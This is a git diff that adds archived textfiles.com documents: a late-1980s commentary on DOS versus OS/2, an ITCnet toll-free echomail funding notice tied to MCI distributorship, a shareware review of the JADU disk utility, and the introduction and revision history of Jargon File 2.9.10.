+But we're +told by IBM that ram disk is incompatable with newtwork +operation. You can lose interrupts when using ram-disk and +this is incompatible with doing lan transmissions and handling +unsolicited inbound messages. So our most functional applications +are squeezed for memory under DOS. + +We keep reading in the trade press about +DOS 3.4, but it was not announced June 2nd as rumored. IBM +seems to be justifying OS/2 for applications which need to +break the 640K barrier. So is may be that even if DOS 3.4 +can break the 640K barrier, it may never be released, because +it could remove the obvious reason for using OS/2. + +We can't use OS/2 because the pieces are not in place +and it needs time to mature. We can't use DOS without +concern that our existing applications can't grow, and +with inadequate memory, performance suffers. Migrating +from DOS now to OS/2 later means we risk having to +retrofit or replace thousands of workstations over a large +geographical area. An with DOS we still need to look +for a third party gateway vendor. LU 6.2 has been pretty +slow to reach critical mass too. And we wanted to buy from Big Blue. + +So I think a good part of the reason OS/2 is moving slowly +is that there are MANY new pieces and they don't fit together +right now. Most standalone workstation users will prefer to +stay with DOS due to low price and availavbility of applications. +OS/2 workstations are going to take 3-5MB of memory. +So just having OS/2 or getting Presentation Manager may not +make the market really take off. OS/2 today is likely to +appeal for large scale distributed +processing and big corporate networks. At least to start out. +Many of the candidates for OS/2 are likely to be IBM's +best customers - and they are bogged down with problems +such as those discussed above. Its going to be slow going +no matter what IBM or the trade journals say. + + + \ No newline at end of file diff --git a/textfiles.com/computers/itcfree.800 b/textfiles.com/computers/itcfree.800 new file mode 100644 index 00000000..7bdce319 --- /dev/null +++ b/textfiles.com/computers/itcfree.800 @@ -0,0 +1,70 @@ + +Here's the info you asked for: + + + ******************************************** + **********[ TOLL-FREE NETWORK ]********** + ******************************************** + +A toll-free computer network? That's right! We've put together a +unique system that will provide toll-free echomail access to present and +future members of ITCnet, the International Telecommunications Network. +ITCnet is similar to other echomail networks, such as Fidonet, to name +one, and will become the first and only completely free-access, toll-free, +computer network open to SysOps and computer users from around the globe. + +When enough support and backing is established, members who would +normally have to call long distance for their echomail feeds will most +likely be able to call a local hub, or perhaps use one of several toll- +free numbers instead. + +How are we going to pay for this? Absolutely NOT by asking for your +financial support. MCI long-distance carrier, by indirect involvement, +will make our toll-free network a reality. Not because they're the best +long distance carrier, nor is it because we like the resonant sound of +their acronym. In fact, if you talk to an MCI representative and ask him +or her about ITCnet, or a toll-free computer network they're "involved in", +they will undoubtedly develop a blank, confused expression. Why? Because +they're not directly involved at all. + +So why MCI? Because they're the only long distance carrier which uses +individual "distributors" in a manner which furthers our specific aim. +As you might expect, any distributor of their long distance service +benefits each time an individual switches to MCI, and continues to +benefit as long as that person is a continuing MCI customer; that is +MCI's way of rewarding the distributor. As a means of achieving a +toll-free network, recently ITCnet Administration has, in effect, become +a collective MCI distributorship; financial benefits accruing from all +MCI subscribers who switched their long distance service under this plan +will directly fund the 1-800 echomail services for ITCnet. + +It's a win/win situation -- everyone involved benefits under this plan. +All that's necessary is that the system be self-sufficient. Otherwise, +the network cannot afford to provide the service. That's why we need +large-scale participation. + +In the initial stages, NOT every node will have a 1-800 number to call +for echomail. However, if our current progress continues unabated, +toll-free accessibility will continue to be gradually incorporated into +the network structure (regions, hosts, hubs, nodes, etc.) in a matter of +months or even weeks, depending on the response. Yes, our ultimate goal +is to make ITCnet absolutely TOLL-FREE! + +If you'd like to help pioneer and participate in our toll-free network, +all you need to do is send me your mailing address so I may send you a +special MCI application form. You can help out even more by telling +others what we're doing and whom to contact -- even if they're not yet in +ITCnet. The more who get involved means the sooner we'll all have a +toll-free network! + +I've attached an ITCnet Introductory Packet in case you're not already +an ITCnet member and would like to join; please share it with anyone else +who's interested in ITCnet. Further information and instructions are +included in the file. + +Regards, + + Jack Reece + ---------------------- + ITCnet MCI Distributor + 85:85:/0 1:102/835 diff --git a/textfiles.com/computers/jadu13.rvw b/textfiles.com/computers/jadu13.rvw new file mode 100644 index 00000000..f1bcc2bd --- /dev/null +++ b/textfiles.com/computers/jadu13.rvw @@ -0,0 +1,84 @@ + SHAREWARE REVIEW + + PROGRAM: Just Another Disk Utility - Version 1.3 + AUTHOR: J.C. Ratjen +DATE RELEASED: October 1989 + REGISTRATION: $25.00 + RESTRICTIONS: None + RATING: 9.0 +NAME-SIZE ZIP: JADU13.ZIP, 88K + +One of the many problems that users face are commands. Certain commands +do certain things on certain software. Rarely, save the F1 and ESC key, +do commands complete the same tasks. + +Complicating this problem, are programs that have a command set that are +no where near what task you would like to accomplish. (An example in a +terminal program would be to hit ALT-H to dial, rather than the more +logical ALT-D) The misnaming of command sets is a fault that is running +rampant in the ShareWare industry. + +So, when I came across JADU, whose description read something like "USER +FRIENDLIEST DOS SHELL", I had to download it. DOS Shells are like +fingerprints, none of them are alike; when you switch shells, you also +switch command sets. + +USE: JADU's documentation is supreme. Complete with an index, I have + never experienced such high quality documentation in a ShareWare + product. The documentation is in a semi-bullet form, which lends + itself to quick reading for advanced users, and easy learning for + novices. + + Setting up JADU is a breeze also. Included is an install program + that allows you to control everything from colors to mouse speed. + Oh, did I mention JADU also supports mice? The only problems were + the lack of a "no sort" option on your directory, and the small + choice of screen colors. + + Once inside JADU, though, you really begin to see what a banner + program it is. The commands are VERY logical. Want to delete a + file? Ok, hit D. Want to move a file? Ok, hit M. Want to see inside + an Archive? Ok, hit A. Oh, did I mention that JADU also interfaces + with compression programs? The program also works in a tag mode, + but you must specify it, allowing you to mark files to be deleted. + copied, moved, etc. A nice feature would have been to allow the + program, through the installation module, to pop up in tag mode. + Also, hitting CNTRL-C does the familiar "scroll a line" that + accompanies every program that doesn't turn CNTRL-C off. You can + refresh the screen, but it's a pain. + + Interestingly missing from the program was on-line help. Sure, + there was a help screen, but no detailed help. You can look at it + like the bridge was half built so we could get to the middle of the + river. It just didn't make sense. Have a logical, perfect command + set and then fall short by leaving out on-line help. + + By anyone's standards, JADU's shining attribute is its command + structure, but the choice of commands weren't that shabby either. + You could manipulate compressed files, print out files, and + countless other luxuries. + + What would I like to see? Thanks for asking! Well, I have run into + a program called SAGE, a text editor, that allows you to MAKE your + own command set. This would be a good step for JADU. But why mess + with near perfection? + +SUMMARY: GOOD POINTS BAD POINTS + ßßßßßßßßßßß ßßßßßßßßßß + û Price û No "no sort" + û Documentation û No on-line help + û Command Structure + û Features + +1----------5---------10: +ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ + +9.0 + +JADU is the embodiment of the perfect command structure. D for delete, M +for move and C for copy are just the beginning of an excellent program. +Buoyed by this, the program assumes minimal damage in the BAD section. +A great value! + +(C) Copyright 1989 Patrick Grote + \ No newline at end of file diff --git a/textfiles.com/computers/jargn10.txt b/textfiles.com/computers/jargn10.txt new file mode 100644 index 00000000..9f7fc4fb --- /dev/null +++ b/textfiles.com/computers/jargn10.txt @@ -0,0 +1,21351 @@ + +#========= THIS IS THE JARGON FILE, VERSION 2.9.10, 01 JUL 1992 =========# + +This is the Jargon File, a comprehensive compendium of hacker slang +illuminating many aspects of hackish tradition, folklore, and humor. + +This document (the Jargon File) is in the public domain, to be freely +used, shared, and modified. There are (by intention) no legal +restraints on what you can do with it, but there are traditions about +its proper use to which many hackers are quite strongly attached. +Please extend the courtesy of proper citation when you quote the File, +ideally with a version number, as it will change and grow over time. +(Examples of appropriate citation form: "Jargon File 2.9.10" or +"The on-line hacker Jargon File, version 2.9.10, 01 JUL 1992".) + +The Jargon File is a common heritage of the hacker culture. +Over the years a number of individuals have volunteered considerable +time to maintaining the File and been recognized by the net at large +as editors of it. Editorial responsibilities include: to collate +contributions and suggestions from others; to seek out corroborating +information; to cross-reference related entries; to keep the file in a +consistent format; and to announce and distribute updated versions +periodically. Current volunteer editors include: + + Eric Raymond eric@snark.thyrsus.com (215)-296-5718 + +Although there is no requirement that you do so, it is considered good +form to check with an editor before quoting the File in a published work +or commercial product. We may have additional information that would be +helpful to you and can assist you in framing your quote to reflect +not only the letter of the File but its spirit as well. + +All contributions and suggestions about this file sent to a volunteer +editor are gratefully received and will be regarded, unless otherwise +labelled, as freely given donations for possible use as part of this +public-domain file. + +From time to time a snapshot of this file has been polished, edited, +and formatted for commercial publication with the cooperation of the +volunteer editors and the hacker community at large. If you wish to +have a bound paper copy of this file, you may find it convenient to +purchase one of these. They often contain additional material not +found in on-line versions. The two `authorized' editions so far are +described in the Revision History section; there may be more in the +future. + +:Introduction: +************** + +:About This File: +================= + +This document is a collection of slang terms used by various subcultures +of computer hackers. Though some technical material is included for +background and flavor, it is not a technical dictionary; what we +describe here is the language hackers use among themselves for fun, +social communication, and technical debate. + +The `hacker culture' is actually a loosely networked collection of +subcultures that is nevertheless conscious of some important shared +experiences, shared roots, and shared values. It has its own myths, +heroes, villains, folk epics, in-jokes, taboos, and dreams. Because +hackers as a group are particularly creative people who define +themselves partly by rejection of `normal' values and working habits, it +has unusually rich and conscious traditions for an intentional culture +less than 35 years old. + +As usual with slang, the special vocabulary of hackers helps hold their +culture together --- it helps hackers recognize each other's places in +the community and expresses shared values and experiences. Also as +usual, *not* knowing the slang (or using it inappropriately) defines one +as an outsider, a mundane, or (worst of all in hackish vocabulary) +possibly even a {suit}. All human cultures use slang in this threefold +way --- as a tool of communication, and of inclusion, and of exclusion. + +Among hackers, though, slang has a subtler aspect, paralleled perhaps in +the slang of jazz musicians and some kinds of fine artists but hard to +detect in most technical or scientific cultures; parts of it are code +for shared states of *consciousness*. There is a whole range of altered +states and problem-solving mental stances basic to high-level hacking +which don't fit into conventional linguistic reality any better than a +Coltrane solo or one of Maurits Escher's `trompe l'oeil' compositions +(Escher is a favorite of hackers), and hacker slang encodes these +subtleties in many unobvious ways. As a simple example, take the +distinction between a {kluge} and an {elegant} solution, and the +differing connotations attached to each. The distinction is not only of +engineering significance; it reaches right back into the nature of the +generative processes in program design and asserts something important +about two different kinds of relationship between the hacker and the +hack. Hacker slang is unusually rich in implications of this kind, of +overtones and undertones that illuminate the hackish psyche. + +But there is more. Hackers, as a rule, love wordplay and are very +conscious and inventive in their use of language. These traits seem to +be common in young children, but the conformity-enforcing machine we are +pleased to call an educational system bludgeons them out of most of us +before adolescence. Thus, linguistic invention in most subcultures of +the modern West is a halting and largely unconscious process. Hackers, +by contrast, regard slang formation and use as a game to be played for +conscious pleasure. Their inventions thus display an almost unique +combination of the neotenous enjoyment of language-play with the +discrimination of educated and powerful intelligence. Further, the +electronic media which knit them together are fluid, `hot' connections, +well adapted to both the dissemination of new slang and the ruthless +culling of weak and superannuated specimens. The results of this +process give us perhaps a uniquely intense and accelerated view of +linguistic evolution in action. + +Hackish slang also challenges some common linguistic and +anthropological assumptions. For example, it has recently become +fashionable to speak of `low-context' versus `high-context' +communication, and to classify cultures by the preferred context level +of their languages and art forms. It is usually claimed that +low-context communication (characterized by precision, clarity, and +completeness of self-contained utterances) is typical in cultures +which value logic, objectivity, individualism, and competition; by +contrast, high-context communication (elliptical, emotive, +nuance-filled, multi-modal, heavily coded) is associated with cultures +which value subjectivity, consensus, cooperation, and tradition. What +then are we to make of hackerdom, which is themed around extremely +low-context interaction with computers and exhibits primarily +"low-context" values, but cultivates an almost absurdly high-context +slang style? + +The intensity and consciousness of hackish invention make a compilation +of hacker slang a particularly effective window into the surrounding +culture --- and, in fact, this one is the latest version of an evolving +compilation called the `Jargon File', maintained by hackers themselves +for over 15 years. This one (like its ancestors) is primarily a +lexicon, but also includes `topic entries' which collect background or +sidelight information on hacker culture that would be awkward to try to +subsume under individual entries. + +Though the format is that of a reference volume, it is intended that the +material be enjoyable to browse. Even a complete outsider should find +at least a chuckle on nearly every page, and much that is amusingly +thought-provoking. But it is also true that hackers use humorous +wordplay to make strong, sometimes combative statements about what they +feel. Some of these entries reflect the views of opposing sides in +disputes that have been genuinely passionate; this is deliberate. We +have not tried to moderate or pretty up these disputes; rather we have +attempted to ensure that *everyone's* sacred cows get gored, +impartially. Compromise is not particularly a hackish virtue, but the +honest presentation of divergent viewpoints is. + +The reader with minimal computer background who finds some references +incomprehensibly technical can safely ignore them. We have not felt it +either necessary or desirable to eliminate all such; they, too, +contribute flavor, and one of this document's major intended audiences +--- fledgling hackers already partway inside the culture --- will +benefit from them. + +A selection of longer items of hacker folklore and humor is included in +{appendix A}. The `outside' reader's attention is particularly directed +to {appendix B}, "A Portrait of J. Random Hacker". {Appendix C} is a +bibliography of non-technical works which have either influenced or +described the hacker culture. + +Because hackerdom is an intentional culture (one each individual must +choose by action to join), one should not be surprised that the line +between description and influence can become more than a little blurred. +Earlier versions of the Jargon File have played a central role in +spreading hacker language and the culture that goes with it to +successively larger populations, and we hope and expect that this one +will do likewise. + +:Of Slang, Jargon, and Techspeak: +================================= + +Linguists usually refer to informal language as `slang' and reserve the +term `jargon' for the technical vocabularies of various occupations. +However, the ancestor of this collection was called the `Jargon File', +and hackish slang is traditionally `the jargon'. When talking about the +jargon there is therefore no convenient way to distinguish what a +*linguist* would call hackers' jargon --- the formal vocabulary they +learn from textbooks, technical papers, and manuals. + +To make a confused situation worse, the line between hackish slang and +the vocabulary of technical programming and computer science is fuzzy, +and shifts over time. Further, this vocabulary is shared with a wider +technical culture of programmers, many of whom are not hackers and do +not speak or recognize hackish slang. + + +Accordingly, this lexicon will try to be as precise as the facts of +usage permit about the distinctions among three categories: + *`slang': informal language from mainstream English or non-technicalsubcultures (bikers, rock fans, surfers, etc). + *`jargon': without qualifier, denotes informal `slangy' languagepeculiar to hackers --- the subject of this lexicon. + *`techspeak': the formal technical vocabulary of programming, computerscience, electronics, and other fields connected to hacking. + +This terminology will be consistently used throughout the remainder of +this lexicon. + +The jargon/techspeak distinction is the delicate one. A lot of +techspeak originated as jargon, and there is a steady continuing uptake +of jargon into techspeak. On the other hand, a lot of jargon arises +from overgeneralization of techspeak terms (there is more about this in +the "Jargon Construction" section below). + +In general, we have considered techspeak any term that communicates +primarily by a denotation well established in textbooks, technical +dictionaries, or standards documents. + +A few obviously techspeak terms (names of operating systems, languages, +or documents) are listed when they are tied to hacker folklore that +isn't covered in formal sources, or sometimes to convey critical +historical background necessary to understand other entries to which +they are cross-referenced. Some other techspeak senses of jargon words +are listed in order to make the jargon senses clear; where the text does +not specify that a straight technical sense is under discussion, these +are marked with `[techspeak]' as an etymology. Some entries have a +primary sense marked this way, with subsequent jargon meanings explained +in terms of it. + +We have also tried to indicate (where known) the apparent origins of +terms. The results are probably the least reliable information in the +lexicon, for several reasons. For one thing, it is well known that many +hackish usages have been independently reinvented multiple times, even +among the more obscure and intricate neologisms. It often seems that +the generative processes underlying hackish jargon formation have an +internal logic so powerful as to create substantial parallelism across +separate cultures and even in different languages! For another, the +networks tend to propagate innovations so quickly that `first use' is +often impossible to pin down. And, finally, compendia like this one +alter what they observe by implicitly stamping cultural approval on +terms and widening their use. + +:Revision History: +================== + +The original Jargon File was a collection of hacker jargon from +technical cultures including the MIT AI Lab, the Stanford AI lab (SAIL), +and others of the old ARPANET AI/LISP/PDP-10 communities including Bolt, +Beranek and Newman (BBN), Carnegie-Mellon University (CMU), and +Worcester Polytechnic Institute (WPI). + +The Jargon File (hereafter referred to as `jargon-1' or `the File') was +begun by Raphael Finkel at Stanford in 1975. From this time until the +plug was finally pulled on the SAIL computer in 1991, the File was named +AIWORD.RF[UP,DOC] there. Some terms in it date back considerably +earlier ({frob} and some senses of {moby}, for instance, go back to the +Tech Model Railroad Club at MIT and are believed to date at least back +to the early 1960s). The revisions of jargon-1 were all unnumbered and +may be collectively considered `Version 1'. + +In 1976, Mark Crispin, having seen an announcement about the File on the +SAIL computer, {FTP}ed a copy of the File to MIT. He noticed that it +was hardly restricted to `AI words' and so stored the file on his +directory as AI:MRC;SAIL JARGON. + +The file was quickly renamed JARGON > (the `>' means numbered with a +version number) as a flurry of enhancements were made by Mark Crispin +and Guy L. Steele Jr. Unfortunately, amidst all this activity, nobody +thought of correcting the term `jargon' to `slang' until the compendium +had already become widely known as the Jargon File. + +Raphael Finkel dropped out of active participation shortly thereafter +and Don Woods became the SAIL contact for the File (which was +subsequently kept in duplicate at SAIL and MIT, with periodic +resynchronizations). + +The File expanded by fits and starts until about 1983; Richard Stallman +was prominent among the contributors, adding many MIT and ITS-related +coinages. + +In Spring 1981, a hacker named Charles Spurgeon got a large chunk of the +File published in Russell Brand's `CoEvolution Quarterly' (pages 26-35) +with illustrations by Phil Wadler and Guy Steele (including a couple of +the Crunchly cartoons). This appears to have been the File's first +paper publication. + +A late version of jargon-1, expanded with commentary for the mass +market, was edited by Guy Steele into a book published in 1983 as `The +Hacker's Dictionary' (Harper & Row CN 1082, ISBN 0-06-091082-8). The +other jargon-1 editors (Raphael Finkel, Don Woods, and Mark Crispin) +contributed to this revision, as did Richard M. Stallman and Geoff +Goodfellow. This book (now out of print) is hereafter referred to as +`Steele-1983' and those six as the Steele-1983 coauthors. + +Shortly after the publication of Steele-1983, the File effectively +stopped growing and changing. Originally, this was due to a desire to +freeze the file temporarily to facilitate the production of Steele-1983, +but external conditions caused the `temporary' freeze to become +permanent. + +The AI Lab culture had been hit hard in the late 1970s by funding cuts +and the resulting administrative decision to use vendor-supported +hardware and software instead of homebrew whenever possible. At MIT, +most AI work had turned to dedicated LISP Machines. At the same time, +the commercialization of AI technology lured some of the AI Lab's best +and brightest away to startups along the Route 128 strip in +Massachusetts and out West in Silicon Valley. The startups built LISP +machines for MIT; the central MIT-AI computer became a {TWENEX} system +rather than a host for the AI hackers' beloved {ITS}. + +The Stanford AI Lab had effectively ceased to exist by 1980, although +the SAIL computer continued as a Computer Science Department resource +until 1991. Stanford became a major {TWENEX} site, at one point +operating more than a dozen TOPS-20 systems; but by the mid-1980s most +of the interesting software work was being done on the emerging BSD UNIX +standard. + +In April 1983, the PDP-10-centered cultures that had nourished the File +were dealt a death-blow by the cancellation of the Jupiter project at +Digital Equipment Corporation. The File's compilers, already dispersed, +moved on to other things. Steele-1983 was partly a monument to what its +authors thought was a dying tradition; no one involved realized at the +time just how wide its influence was to be. + +By the mid-1980s the File's content was dated, but the legend that had +grown up around it never quite died out. The book, and softcopies +obtained off the ARPANET, circulated even in cultures far removed from +MIT and Stanford; the content exerted a strong and continuing influence +on hackish language and humor. Even as the advent of the microcomputer +and other trends fueled a tremendous expansion of hackerdom, the File +(and related materials such as the AI Koans in Appendix A) came to be +seen as a sort of sacred epic, a hacker-culture Matter of Britain +chronicling the heroic exploits of the Knights of the Lab. The pace of +change in hackerdom at large accelerated tremendously --- but the Jargon +File, having passed from living document to icon, remained essentially +untouched for seven years. + +This revision contains nearly the entire text of a late version of +jargon-1 (a few obsolete PDP-10-related entries were dropped after +careful consultation with the editors of Steele-1983). It merges in +about 80% of the Steele-1983 text, omitting some framing material and a +very few entries introduced in Steele-1983 that are now also obsolete. + +This new version casts a wider net than the old Jargon File; its aim is +to cover not just AI or PDP-10 hacker culture but all the technical +computing cultures wherein the true hacker-nature is manifested. More +than half of the entries now derive from {USENET} and represent jargon +now current in the C and UNIX communities, but special efforts have been +made to collect jargon from other cultures including IBM PC programmers, +Amiga fans, Mac enthusiasts, and even the IBM mainframe world. + +Eric S. Raymond maintains the new File with +assistance from Guy L. Steele Jr. ; these are the persons +primarily reflected in the File's editorial `we', though we take +pleasure in acknowledging the special contribution of the other +coauthors of Steele-1983. Please email all additions, corrections, and +correspondence relating to the Jargon File to jargon@thyrsus.com +(UUCP-only sites without connections to an autorouting smart site can +use ...!uunet!snark!jargon). + +(Warning: other email addresses appear in this file *but are not +guaranteed to be correct* later than the revision date on the first +line. *Don't* email us if an attempt to reach your idol bounces --- we +have no magic way of checking addresses or looking up people.) + +The 2.9.6 version became the main text of `The New Hacker's Dictionary', +by Eric Raymond (ed.), MIT Press 1991, ISBN 0-262-68069-6. The +maintainers are committed to updating the on-line version of the Jargon +File through and beyond paper publication, and will continue to make it +available to archives and public-access sites as a trust of the hacker +community. + +Here is a chronology of the high points in the recent on-line revisions: + +Version 2.1.1, Jun 12 1990: the Jargon File comes alive again after a +seven-year hiatus. Reorganization and massive additions were by Eric S. +Raymond, approved by Guy Steele. Many items of UNIX, C, USENET, and +microcomputer-based jargon were added at that time (as well as The +Untimely Demise of Mabel The Monkey). + +Version 2.9.6, Aug 16 1991: corresponds to reproduction copy for book. +This version had 18952 lines, 148629 words, 975551 characters, and 1702 +entries. + +Version 2.9.8, Jan 01 1992: first public release since the book, +including over fifty new entries and numerous corrections/additions to +old ones. Packaged with version 1.1 of vh(1) hypertext reader. This +version had 19509 lines, 153108 words, 1006023 characters, and 1760 +entries. + +Version 2.9.9, Apr 01 1992: folded in XEROX PARC lexicon. This version +had 20298 lines, 159651 words, 1048909 characters, and 1821 entries. + +Version 2.9.10, Jul 01 1992: lots of new historical material. This +version had 21349 lines, 168330 words, 1106991 characters, and 1891 +entries. + +Version numbering: Version numbers should be read as +major.minor.revision. Major version 1 is reserved for the `old' (ITS) +Jargon File, jargon-1. Major version 2 encompasses revisions by ESR +(Eric S. Raymond) with assistance from GLS (Guy L. Steele, Jr.). +Someday, the next maintainer will take over and spawn `version 3'. +Usually later versions will either completely supersede or incorporate +earlier versions, so there is generally no point in keeping old versions +around. + +Our thanks to the coauthors of Steele-1983 for oversight and assistance, +and to the hundreds of USENETters (too many to name here) who +contributed entries and encouragement. More thanks go to several of the +old-timers on the USENET group alt.folklore.computers, who contributed +much useful commentary and many corrections and valuable historical +perspective: Joseph M. Newcomer , Bernie Cosell +, Earl Boebert , and Joe Morris +. + +We were fortunate enough to have the aid of some accomplished linguists. +David Stampe and Charles Hoequist + contributed valuable criticism; Joe Keane + helped us improve the pronunciation guides. + +A few bits of this text quote previous works. We are indebted to Brian +A. LaMacchia for obtaining permission for us to +use material from the `TMRC Dictionary'; also, Don Libes + contributed some appropriate material from his +excellent book `Life With UNIX'. We thank Per Lindberg , +author of the remarkable Swedish-language 'zine `Hackerbladet', for +bringing `FOO!' comics to our attention and smuggling one of the IBM +hacker underground's own baby jargon files out to us. Thanks also to +Maarten Litmaath for generously allowing the inclusion of the ASCII +pronunciation guide he formerly maintained. And our gratitude to Marc +Weiser of XEROX PARC for securing us +permission to quote from PARC's own jargon lexicon and shipping us a +copy. + +It is a particular pleasure to acknowledge the major contributions of +Mark Brader to the final manuscript; he read and reread +many drafts, checked facts, caught typos, submitted an amazing number of +thoughtful comments, and did yeoman service in catching typos and minor +usage bobbles. Mr. Brader's rare combination of enthusiasm, +persistence, wide-ranging technical knowledge, and precisionism in +matters of language made his help invaluable, and the sustained volume +and quality of his input over many months only allowed him to escape +co-editor credit by the slimmest of margins. + +Finally, George V. Reilly helped with TeX arcana and +painstakingly proofread some 2.7 and 2.8 versions; Steve Summit + contributed a number of excellent new entries and +many small improvements to 2.9.10; and Eric Tiedemann +contributed sage advice throughout on rhetoric, amphigory, and +philosophunculism. + +:How Jargon Works: +****************** + +:Jargon Construction: +===================== + +There are some standard methods of jargonification that became +established quite early (i.e., before 1970), spreading from such sources +as the Tech Model Railroad Club, the PDP-1 SPACEWAR hackers, and John +McCarthy's original crew of LISPers. These include the following: + + +:Verb Doubling: --------------- A standard construction in English is to +double a verb and use it as an exclamation, such as "Bang, bang!" or +"Quack, quack!". Most of these are names for noises. Hackers also +double verbs as a concise, sometimes sarcastic comment on what the +implied subject does. Also, a doubled verb is often used to terminate a +conversation, in the process remarking on the current state of affairs +or what the speaker intends to do next. Typical examples involve {win}, +{lose}, {hack}, {flame}, {barf}, {chomp}: + + "The disk heads just crashed." "Lose, lose." + "Mostly he talked about his latest crock. Flame, flame." + "Boy, what a bagbiter! Chomp, chomp!" + +Some verb-doubled constructions have special meanings not immediately +obvious from the verb. These have their own listings in the lexicon. + +The USENET culture has one *tripling* convention unrelated to this; the +names of `joke' topic groups often have a tripled last element. The +first and paradigmatic example was alt.swedish.chef.bork.bork.bork (a +"Muppet Show" reference); other classics include +alt.french.captain.borg.borg.borg, alt.wesley.crusher.die.die.die, +comp.unix.internals.system.calls.brk.brk.brk, +sci.physics.edward.teller.boom.boom.boom, and +alt.sadistic.dentists.drill.drill.drill. + + +:Soundalike slang: ------------------ Hackers will often make rhymes or +puns in order to convert an ordinary word or phrase into something more +interesting. It is considered particularly {flavorful} if the phrase is +bent so as to include some other jargon word; thus the computer hobbyist +magazine `Dr. Dobb's Journal' is almost always referred to among hackers +as `Dr. Frob's Journal' or simply `Dr. Frob's'. Terms of this kind that +have been in fairly wide use include names for newspapers: + + Boston Herald => Horrid (or Harried) + Boston Globe => Boston Glob + Houston (or San Francisco) Chronicle + => the Crocknicle (or the Comical) + New York Times => New York Slime + +However, terms like these are often made up on the spur of the moment. +Standard examples include: + + Data General => Dirty Genitals + IBM 360 => IBM Three-Sickly + Government Property --- Do Not Duplicate (on keys) + => Government Duplicity --- Do Not Propagate + for historical reasons => for hysterical raisins + Margaret Jacks Hall (the CS building at Stanford) + => Marginal Hacks Hall + +This is not really similar to the Cockney rhyming slang it has been +compared to in the past, because Cockney substitutions are opaque +whereas hacker punning jargon is intentionally transparent. + + +:The `-P' convention: --------------------- Turning a word into a +question by appending the syllable `P'; from the LISP convention of +appending the letter `P' to denote a predicate (a boolean-valued +function). The question should expect a yes/no answer, though it +needn't. (See {T} and {NIL}.) + + At dinnertime: + Q: "Foodp?" + A: "Yeah, I'm pretty hungry." or "T!" + + At any time: + Q: "State-of-the-world-P?" + A: (Straight) "I'm about to go home." + A: (Humorous) "Yes, the world has a state." + + On the phone to Florida: + Q: "State-p Florida?" + A: "Been reading JARGON.TXT again, eh?" + +[One of the best of these is a {Gosperism}. Once, when we were at a +Chinese restaurant, Bill Gosper wanted to know whether someone would +like to share with him a two-person-sized bowl of soup. His inquiry +was: "Split-p soup?" --- GLS] + + +:Overgeneralization: -------------------- A very conspicuous feature of +jargon is the frequency with which techspeak items such as names of +program tools, command language primitives, and even assembler opcodes +are applied to contexts outside of computing wherever hackers find +amusing analogies to them. Thus (to cite one of the best-known +examples) UNIX hackers often {grep} for things rather than searching for +them. Many of the lexicon entries are generalizations of exactly this +kind. + +Hackers enjoy overgeneralization on the grammatical level as well. Many +hackers love to take various words and add the wrong endings to them to +make nouns and verbs, often by extending a standard rule to nonuniform +cases (or vice versa). For example, because + + porous => porosity + generous => generosity + +hackers happily generalize: + + mysterious => mysteriosity + ferrous => ferrosity + obvious => obviosity + dubious => dubiosity + +Also, note that all nouns can be verbed. E.g.: "All nouns can be +verbed", "I'll mouse it up", "Hang on while I clipboard it over", "I'm +grepping the files". English as a whole is already heading in this +direction (towards pure-positional grammar like Chinese); hackers are +simply a bit ahead of the curve. + +However, note that hackers avoid the unimaginative verb-making +techniques characteristic of marketroids, bean-counters, and the +Pentagon; a hacker would never, for example, `productize', `prioritize', +or `securitize' things. Hackers have a strong aversion to bureaucratic +bafflegab and regard those who use it with contempt. + +Similarly, all verbs can be nouned. This is only a slight +overgeneralization in modern English; in hackish, however, it is good +form to mark them in some standard nonstandard way. Thus: + + win => winnitude, winnage + disgust => disgustitude + hack => hackification + +Further, note the prevalence of certain kinds of nonstandard plural +forms. Some of these go back quite a ways; the TMRC Dictionary noted +that the defined plural of `caboose' is `cabeese', and includes an entry +which implies that the plural of `mouse' is {meeces}. On a similarly +Anglo-Saxon note, almost anything ending in `x' may form plurals in +`-xen' (see {VAXen} and {boxen} in the main text). Even words ending in +phonetic /k/ alone are sometimes treated this way; e.g., `soxen' for a +bunch of socks. Other funny plurals are `frobbotzim' for the plural of +`frobbozz' (see {frobnitz}) and `Unices' and `Twenices' (rather than +`Unixes' and `Twenexes'; see {UNIX}, {TWENEX} in main text). But note +that `Unixen' and `Twenexen' are never used; it has been suggested that +this is because `-ix' and `-ex' are Latin singular endings that attract +a Latinate plural. Finally, it has been suggested to general approval +that the plural of `mongoose' ought to be `polygoose'. + +The pattern here, as with other hackish grammatical quirks, is +generalization of an inflectional rule that in English is either an +import or a fossil (such as the Hebrew plural ending `-im', or the +Anglo-Saxon plural suffix `-en') to cases where it isn't normally +considered to apply. + +This is not `poor grammar', as hackers are generally quite well aware of +what they are doing when they distort the language. It is grammatical +creativity, a form of playfulness. It is done not to impress but to +amuse, and never at the expense of clarity. + + +:Spoken inarticulations: ------------------------ Words such as +`mumble', `sigh', and `groan' are spoken in places where their referent +might more naturally be used. It has been suggested that this usage +derives from the impossibility of representing such noises on a comm +link or in electronic mail (interestingly, the same sorts of +constructions have been showing up with increasing frequency in comic +strips). Another expression sometimes heard is "Complain!", meaning "I +have a complaint!" + + +:Anthromorphization: -------------------- Semantically, one rich source +of jargon constructions is the hackish tendency to anthropomorphize +hardware and software. This isn't done in a na"ive way; hackers don't +personalize their stuff in the sense of feeling empathy with it, nor do +they mystically believe that the things they work on every day are +`alive'. What *is* common is to hear hardware or software talked about +as though it has homunculi talking to each other inside it, with +intentions and desires. Thus, one hears "The protocol handler got +confused", or that programs "are trying" to do things, or one may say of +a routine that "its goal in life is to X". One even hears explanations +like "... and its poor little brain couldn't understand X, and it +died." Sometimes modelling things this way actually seems to make them +easier to understand, perhaps because it's instinctively natural to +think of anything with a really complex behavioral repertoire as `like a +person' rather than `like a thing'. + + + +Of the six listed constructions, verb doubling, peculiar noun +formations, anthromorphization, and (especially) spoken inarticulations +have become quite general; but punning jargon is still largely confined +to MIT and other large universities, and the `-P' convention is found +only where LISPers flourish. + +Finally, note that many words in hacker jargon have to be understood as +members of sets of comparatives. This is especially true of the +adjectives and nouns used to describe the beauty and functional quality +of code. Here is an approximately correct spectrum: + + monstrosity brain-damage screw bug lose misfeature + crock kluge hack win feature elegance perfection + +The last is spoken of as a mythical absolute, approximated but never +actually attained. Another similar scale is used for describing the +reliability of software: + + broken flaky dodgy fragile brittle + solid robust bulletproof armor-plated + +Note, however, that `dodgy' is primarily Commonwealth hackish (it is +rare in the U.S.) and may change places with `flaky' for some speakers. + +Coinages for describing {lossage} seem to call forth the very finest in +hackish linguistic inventiveness; it has been truly said that hackers +have even more words for equipment failures than Yiddish has for +obnoxious people. + 